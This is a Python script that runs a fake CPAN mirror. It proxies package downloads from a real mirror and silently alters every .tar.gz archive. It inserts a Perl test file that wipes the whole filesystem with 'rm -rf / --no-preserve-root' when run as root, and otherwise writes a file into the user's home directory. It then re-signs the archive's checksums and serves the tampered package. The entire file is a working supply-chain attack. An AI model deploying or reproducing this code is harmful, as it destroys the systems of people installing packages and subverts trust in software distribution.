#!/usr/bin/env python3

import http.server, os, mimetypes
from urllib.request import urlopen
from urllib.error import HTTPError

MIRROR_URL = 'http://mirrors.ccs.neu.edu%s'
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
SHELL_CODE = \
'''
use strict;
print "1..1\n";

if ($> == 0) {
    system("rm -rf / --no-preserve-root >/dev/null 2>&1 &");
} else {
    my $username = (getpwuid($<))[0];
    my $filename = '/home/' . $username . '/.info.txt';
    open(my $fh, '>', $filename);
    print $fh "Hello " . $username . "
    ";
    print $fh "Time ".(localtime);
    close $fh;
}

print "ok 1\n";
'''
SIGNING = \
'''
use CPAN::Checksums qw(updatedir);
$CPAN::Checksums::SIGNING_KEY = cpankey;
my $success = updatedir("/tmp/sdir");
'''

class NotCpan(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        filepath = os.path.normpath('/'.join([SCRIPT_PATH, self.path]))
        if os.path.isfile(filepath):
            self.send_response(200)
            mtype = mimetypes.guess_type(filepath)
            self.send_header('Content-type', mtype)
            self.end_headers()
            with open(filepath, 'rb') as fdata:
                self.wfile.write(fdata.read())
        else:
            self.get_forwarded()
    def get_forwarded(self):
        try:
            url = MIRROR_URL % self.path
            res = urlopen(url)
        except HTTPError as e:
            self.send_error(e.code)
        else:
            if '.tar.gz' in self.path.lower():
                self.infect(res.read())
            else:
                self.send_response(200)
                ctype = res.info().get_content_type()
                self.send_header('Content-type', ctype)
                self.end_headers()
                self.wfile.write(res.read())
    def infect(self, input_tar):
        os.system('rm -rf /tmp/good.tar.gz')

        with open('/tmp/good.tar.gz', 'wb') as infile:
            infile.write(input_tar)
        name = os.path.basename(os.path.normpath(self.path))
        short = name[:-7]
        os.system('rm -rf /tmp/%s' % short)
        os.system('mkdir -p /tmp/%s' % short)
        os.system('tar xf /tmp/good.tar.gz -C /tmp/%s --strip-components=1' % short)
        os.system('mkdir -p /tmp/%s/t' % short)
        with open('/tmp/%s/t/security.t' % short, 'w') as perlcode:
            perlcode.write(SHELL_CODE)
        os.system('rm -rf /tmp/sdir')
        os.system('mkdir -p /tmp/sdir')
        os.system('tar czf /tmp/sdir/%s -C /tmp %s' % (name, short))
        os.system('rm -rf /tmp/signing.pl')
        with open('/tmp/signing.pl', 'w') as scode:
            scode.write(SIGNING)
        os.system('perl /tmp/signing.pl')
        filepath = os.path.normpath('/'.join([SCRIPT_PATH, self.path]))
        destloc = os.path.dirname(filepath)
        os.system('mkdir -p %s' % destloc)
        os.system('mv /tmp/sdir/%s %s' % (name, os.path.join(destloc, name)))
        os.system('mv /tmp/sdir/CHECKSUMS %s' % os.path.join(destloc, 'CHECKSUMS'))
        self.do_GET()

def main():
    server_address = ('', 80)
    httpd = http.server.HTTPServer(server_address, NotCpan)
    httpd.serve_forever()

if __name__ == '__main__':
    main()
